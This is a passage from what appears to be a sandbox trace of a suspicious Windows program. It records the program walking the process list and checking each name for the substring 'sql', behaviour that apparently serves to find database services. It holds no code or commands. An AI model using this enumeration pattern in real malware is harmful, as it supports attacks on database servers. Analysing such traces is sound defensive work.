lpUsedDefaultChar=0x0) returned 12 [0218.814] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0218.814] StrStrIA (lpFirst="spoolsv.exe", lpSrch="sql") returned 0x0 [0218.814] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.815] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35828d0 [0218.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35828d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0218.816] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0218.816] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0218.816] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.817] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35827b0 [0218.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x35827b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0218.817] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0218.817] StrStrIA (lpFirst="audiodg.exe", lpSrch="sql") returned 0x0 [0218.817] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0218.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0218.939] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35829a8 [0218.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x35829a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0218.939] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0218.939] StrStrIA (lpFirst="sihost.exe", lpSrch="sql") returned 0x0 [0218.939] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.940] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582768 [0218.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582768, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0218.941] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0218.941] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0218.941] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0218.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0218.942] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35828e8 [0218.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35828e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0218.945] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0218.945] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0218.945] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0218.946] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582978 [0218.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3582978, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0218.946] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0218.946] StrStrIA (lpFirst="explorer.exe", lpSrch="sql") returned 0x0 [0218.946] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0218.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0218.948] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595f48 [0218.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3595f48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0218.948] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0218.948] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="sql") returned 0x0 [0218.948] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0218.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0218.949] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x35864a8 [0218.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x35864a8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0218.949] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0218.949] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="sql") returned 0x0 [0218.949] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0218.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0218.951] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596028 [0218.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3596028, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0218.951] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0218.951] StrStrIA (lpFirst="Memory Compression", lpSrch="sql") returned 0x0 [0218.951] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0218.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0218.952] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582948 [0218.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3582948, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0218.952] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0218.952] StrStrIA (lpFirst="SearchUI.exe", lpSrch="sql") returned 0x0 [0218.952] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0218.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0218.955] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35961c8 [0218.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x35961c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0218.956] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0218.956] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="sql") returned 0x0 [0218.956] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0218.957] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582750 [0218.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3582750, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0218.957] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0218.957] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0218.957] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0218.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.959] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582828 [0218.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3582828, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0218.959] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0218.959] StrStrIA (lpFirst="pending.exe", lpSrch="sql") returned 0x0 [0218.959] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0218.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0218.960] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x35864f8 [0218.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x35864f8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0218.961] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0218.961] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="sql") returned 0x0 [0218.961] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0218.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0218.962] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3596288 [0218.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3596288, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0218.962] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0218.962] StrStrIA (lpFirst="swing prefer.exe", lpSrch="sql") returned 0x0 [0218.962] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0218.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0218.963] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3586548 [0218.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x3586548, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0218.964] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0218.964] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="sql") returned 0x0 [0218.964] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0218.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0218.965] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596088 [0218.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3596088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0218.965] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0218.965] StrStrIA (lpFirst="nights-attending.exe", lpSrch="sql") returned 0x0 [0218.965] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0218.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0218.967] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3582720 [0218.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3582720, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0218.967] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0218.967] StrStrIA (lpFirst="installed.exe", lpSrch="sql") returned 0x0 [0218.967] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0218.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0218.968] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x35866b0 [0218.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x35866b0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0218.968] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0218.968] StrStrIA (lpFirst="references compounds.exe", lpSrch="sql") returned 0x0 [0218.968] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0218.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0218.975] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596248 [0218.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3596248, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0218.976] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0218.976] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="sql") returned 0x0 [0218.976] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0218.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0218.977] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596108 [0218.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3596108, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0218.977] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0218.977] StrStrIA (lpFirst="registered try.exe", lpSrch="sql") returned 0x0 [0218.977] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0218.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0218.979] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3586728 [0218.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x3586728, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0218.979] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0218.979] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="sql") returned 0x0 [0218.979] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0218.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0218.980] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3582780 [0218.980] 